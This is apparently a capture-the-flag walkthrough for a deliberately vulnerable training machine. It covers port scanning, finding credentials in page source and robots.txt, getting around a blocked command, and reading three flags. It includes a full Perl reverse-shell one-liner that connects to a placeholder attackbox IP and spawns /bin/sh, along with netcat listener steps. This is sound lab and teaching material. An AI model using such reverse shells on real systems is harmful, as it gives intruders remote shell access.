Prerequisites for this machine:-
- Familiarity with enumeration with Nmap and ffuf or gobuster
- Basic understanding of web applications
- Basic Linux knowledge
Enumeration
Running an Nmap scan on the machine shows two open ports, 80 and 22.
Looking at the website doesn’t lead to anything interesting, but checking the source code gives us a username! R1ckRul3s
Checking the robots.txt of the site gives us this weird string, note it down!
Through our web enumeration, we find the page: /login.php, using the username and weird string we found, we can get access.
Great! We have initial access to the machine. Running ls -la shows us two interesting files:-
- Sup3rS3cretPickl3dIngred.txt
- clue.txt
However, trying to cat the ingredient text file gives us an error.
Hint: cat is blocked, but that doesn’t mean other commands are..
Time to use a reverse shell!
Getting the first flag
Some simple reverse shells can be found here.
Trying the bash reverse shell doesn’t work, but the Perl one does!
Remember to use your attackbox’s IP address and choose a port.
perl -e 'use Socket;$i="ATTACKBOX_IP";$p=ATTACKBOX_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Start a netcat listener first.
Then exploit the machine.
Back to our netcat listener, we have a shell!
Let’s get the first flag.
Getting the second flag
Time to find the next flag, check clue.txt.
Checking the /home directory, we can see a directory called rick. Which contains our second flag in “second ingredients”.
Getting the last flag
Digging around the system more, we find our last flag in “/root/3rd.txt”. Since we are sudoers, we can print out the file contents and get the third flag!
